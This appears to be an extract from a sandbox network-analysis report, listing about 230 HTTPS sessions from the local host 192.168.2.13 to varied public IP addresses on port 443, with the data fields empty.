                              Session IDSource IPSource PortDestination IPDestination Port
                              12464192.168.2.134781636.232.207.88443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12465192.168.2.134226650.17.150.40443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12466192.168.2.1338326206.65.63.143443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12467192.168.2.1358812136.246.8.68443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12468192.168.2.1350740213.168.132.80443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12469192.168.2.1348000102.100.38.217443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12470192.168.2.133439425.59.175.226443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12471192.168.2.13541165.139.215.232443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12472192.168.2.1337620209.248.110.70443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12473192.168.2.1335090133.201.51.122443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12474192.168.2.1336092181.212.244.36443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12475192.168.2.1358750114.103.176.165443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12476192.168.2.134700825.33.183.21443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12477192.168.2.1340148140.45.88.116443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12478192.168.2.1343752125.88.143.191443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12479192.168.2.1352096126.49.136.73443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12480192.168.2.1350378120.185.29.193443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12481192.168.2.133328076.87.114.191443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12482192.168.2.1337598134.237.6.6443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12483192.168.2.134540424.40.24.3443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12484192.168.2.133817098.150.179.225443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12485192.168.2.1333316188.138.90.67443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12486192.168.2.1353018131.245.64.84443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12487192.168.2.13335885.215.182.3443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12488192.168.2.1354252114.118.85.52443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12489192.168.2.134773839.15.200.210443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12490192.168.2.133478627.103.237.141443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12491192.168.2.1352382158.182.155.217443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12492192.168.2.1333714190.239.90.114443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12493192.168.2.1354560186.79.101.192443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12494192.168.2.1348548208.230.68.103443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12495192.168.2.1347242132.124.51.208443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12496192.168.2.1347146157.180.79.176443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12497192.168.2.134309642.43.192.206443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12498192.168.2.134879067.235.134.96443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12499192.168.2.134107851.90.16.207443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12500192.168.2.1340100212.27.131.183443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12501192.168.2.133690897.24.225.79443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12502192.168.2.136060286.161.249.65443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12503192.168.2.135220882.222.69.108443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12504192.168.2.134887873.249.213.142443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12505192.168.2.1357824202.115.234.247443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12506192.168.2.13418589.57.143.164443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12507192.168.2.1334830104.14.1.174443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12508192.168.2.134748286.113.114.3443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12509192.168.2.1337920109.94.36.15443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12510192.168.2.1356254152.186.171.3443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12511192.168.2.1349604145.148.119.135443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12512192.168.2.1355478124.12.148.5443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12513192.168.2.134881084.162.219.104443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12514192.168.2.1350042133.228.51.99443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12515192.168.2.135660885.135.129.78443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12516192.168.2.1346178213.132.226.26443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12517192.168.2.1345148100.145.105.250443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12518192.168.2.135532660.119.167.116443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12519192.168.2.135329246.18.139.208443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12520192.168.2.134738892.245.160.112443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12521192.168.2.135446665.115.133.208443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12522192.168.2.1341098206.80.95.188443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12523192.168.2.135152838.213.151.35443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12524192.168.2.1352472182.10.147.158443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12525192.168.2.135668298.127.159.186443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12526192.168.2.1348028123.251.63.96443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12527192.168.2.1352834147.250.160.101443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12528192.168.2.136049695.185.4.61443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12529192.168.2.1336054106.60.29.169443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12530192.168.2.134391454.213.185.122443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12531192.168.2.1357290122.33.166.131443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12532192.168.2.1346452196.111.81.34443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12533192.168.2.135682680.7.10.144443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12534192.168.2.135121494.245.180.254443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12535192.168.2.1353704222.120.192.10443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12536192.168.2.1355756204.104.161.125443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12537192.168.2.134856499.87.198.223443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12538192.168.2.1336458189.20.33.228443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12539192.168.2.1338412163.120.142.251443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12540192.168.2.1345186115.54.204.144443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12541192.168.2.135683643.254.238.152443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12542192.168.2.134815695.215.123.73443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12543192.168.2.1345294197.94.213.75443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12544192.168.2.133986645.153.202.33443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12545192.168.2.133817672.38.104.0443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12546192.168.2.1337472116.172.175.118443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12547192.168.2.1336192102.45.248.180443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12548192.168.2.135617690.121.102.133443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12549192.168.2.135861678.239.23.92443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12550192.168.2.135683276.217.240.105443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12551192.168.2.1358992208.158.73.15443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12552192.168.2.1346796134.151.42.46443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12553192.168.2.1358056155.222.74.186443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12554192.168.2.1345988174.25.2.249443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12555192.168.2.1343786119.101.175.95443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12556192.168.2.1346306177.92.82.68443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12557192.168.2.135258282.204.14.61443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12558192.168.2.1352880128.139.111.225443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12559192.168.2.134112419.80.61.199443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12560192.168.2.1358750213.80.173.26443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12561192.168.2.1333388192.254.174.240443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12562192.168.2.1338448197.223.210.231443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12563192.168.2.135362884.34.255.169443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12564192.168.2.135641269.101.225.241443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12565192.168.2.1349524140.211.91.139443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12566192.168.2.1356256183.25.99.175443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12567192.168.2.135784259.209.250.217443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12568192.168.2.135908027.117.245.31443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12569192.168.2.1335194153.37.206.87443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12570192.168.2.1355836206.238.245.15443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12571192.168.2.1339726219.83.53.244443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12572192.168.2.133712039.3.159.4443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12573192.168.2.134854231.143.193.23443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12574192.168.2.1336378174.245.99.30443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12575192.168.2.135117078.76.191.14443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12576192.168.2.133682890.96.230.39443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12577192.168.2.134722457.47.47.42443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12578192.168.2.134257053.128.166.185443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12579192.168.2.13422125.108.223.8443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12580192.168.2.135763293.180.13.241443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12581192.168.2.1344750113.26.39.241443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12582192.168.2.135875624.116.208.40443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12583192.168.2.134901440.112.208.188443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12584192.168.2.1351794160.119.204.191443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12585192.168.2.1339982192.147.145.157443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12586192.168.2.1332862126.218.14.232443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12587192.168.2.1359652198.88.134.164443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12588192.168.2.13342041.3.231.99443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12589192.168.2.1341534136.59.99.47443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12590192.168.2.1345748131.121.253.66443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12591192.168.2.135330634.151.21.141443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12592192.168.2.134393643.106.241.62443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12593192.168.2.1353874111.179.140.74443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12594192.168.2.133949880.163.80.17443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12595192.168.2.1333128190.228.157.83443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12596192.168.2.1341866128.223.167.202443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12597192.168.2.1357212136.171.242.83443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12598192.168.2.135084672.232.35.186443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12599192.168.2.134893052.111.22.221443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12600192.168.2.1348306140.128.128.191443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12601192.168.2.133828825.7.60.237443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12602192.168.2.1356894143.106.70.233443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12603192.168.2.1356562205.136.170.60443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12604192.168.2.1353744192.163.164.124443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12605192.168.2.1355594139.29.129.63443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12606192.168.2.135928445.251.113.165443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12607192.168.2.1340130122.40.139.237443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12608192.168.2.1350766103.127.30.172443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12609192.168.2.134487443.32.62.74443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12610192.168.2.1346200142.182.220.113443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12611192.168.2.134537497.210.143.36443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12612192.168.2.1352526148.147.128.174443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12613192.168.2.1337742157.110.56.55443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12614192.168.2.1356462101.80.253.70443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12615192.168.2.134943235.80.97.157443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12616192.168.2.1359980109.93.219.80443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12617192.168.2.136016670.238.192.148443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12618192.168.2.134651863.180.78.181443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12619192.168.2.135962869.212.83.159443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12620192.168.2.1350624138.90.166.197443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12621192.168.2.1356182101.221.119.93443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12622192.168.2.135181085.86.251.224443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12623192.168.2.1349818117.213.187.97443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12624192.168.2.1345220199.157.49.189443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12625192.168.2.1350136147.1.156.163443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12626192.168.2.1340006150.214.35.132443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12627192.168.2.1347010107.38.180.120443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12628192.168.2.1340020219.74.217.170443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12629192.168.2.1339254173.50.230.167443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12630192.168.2.135434814.151.176.170443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12631192.168.2.135862088.35.191.127443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12632192.168.2.1337010153.247.198.223443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12633192.168.2.1334370170.103.58.96443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12634192.168.2.133341827.231.231.229443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12635192.168.2.13446942.136.139.121443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12636192.168.2.134714417.170.194.87443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12637192.168.2.1332978115.3.1.216443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12638192.168.2.1333870115.161.7.231443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12639192.168.2.135879050.65.166.231443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12640192.168.2.1358580136.108.132.157443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12641192.168.2.134440671.162.85.35443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12642192.168.2.133714042.80.67.37443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12643192.168.2.1353766145.88.81.175443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12644192.168.2.1338426195.255.53.86443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12645192.168.2.134384642.76.243.150443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12646192.168.2.135746498.155.167.71443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12647192.168.2.134434250.188.41.224443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12648192.168.2.135554463.216.172.136443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12649192.168.2.1338928191.66.87.112443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12650192.168.2.1345402123.21.88.52443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12651192.168.2.1351342162.212.128.182443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12652192.168.2.135960658.129.0.108443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12653192.168.2.1353112206.200.214.106443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12654192.168.2.1353910133.110.152.117443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12655192.168.2.1351894217.105.90.23443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12656192.168.2.133603020.229.23.218443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12657192.168.2.1342100164.191.110.103443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12658192.168.2.1358708210.40.109.4443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12659192.168.2.1350632103.35.244.69443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12660192.168.2.1338576189.31.171.243443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12661192.168.2.1347500193.124.28.176443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12662192.168.2.134792818.25.6.233443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12663192.168.2.134101464.200.2.11443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12664192.168.2.1358956196.52.168.77443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12665192.168.2.134068080.87.50.46443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12666192.168.2.1334284123.178.239.49443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12667192.168.2.1360028133.55.52.192443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12668192.168.2.1359928133.161.193.220443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12669192.168.2.13602762.114.107.194443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12670192.168.2.1353778201.29.183.14443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12671192.168.2.1341864103.46.108.35443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12672192.168.2.1350196174.74.188.16443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12673192.168.2.135923663.131.218.161443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12674192.168.2.135302043.62.60.114443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12675192.168.2.1353122163.204.20.140443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12676192.168.2.1358440141.77.246.70443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12677192.168.2.1334526152.250.187.134443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12678192.168.2.133926274.72.12.224443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12679192.168.2.1359372138.105.39.23443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12680192.168.2.135818074.115.33.150443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12681192.168.2.1351008153.226.31.125443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12682192.168.2.1338940207.171.149.157443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12683192.168.2.133383676.162.0.139443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12684192.168.2.1345702101.52.76.34443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12685192.168.2.1347090108.129.10.233443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12686192.168.2.13547701.247.203.1443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12687192.168.2.1346446101.181.156.155443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12688192.168.2.133390287.9.160.19443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12689192.168.2.1345118199.134.208.37443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12690192.168.2.1340842121.228.242.148443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12691192.168.2.1335760106.208.91.190443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12692192.168.2.1338156159.153.54.35443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12693192.168.2.1357126165.131.55.82443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12694192.168.2.1337732173.76.24.168443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12695192.168.2.135838249.174.147.221443
                              TimestampBytes transferredDirectionData


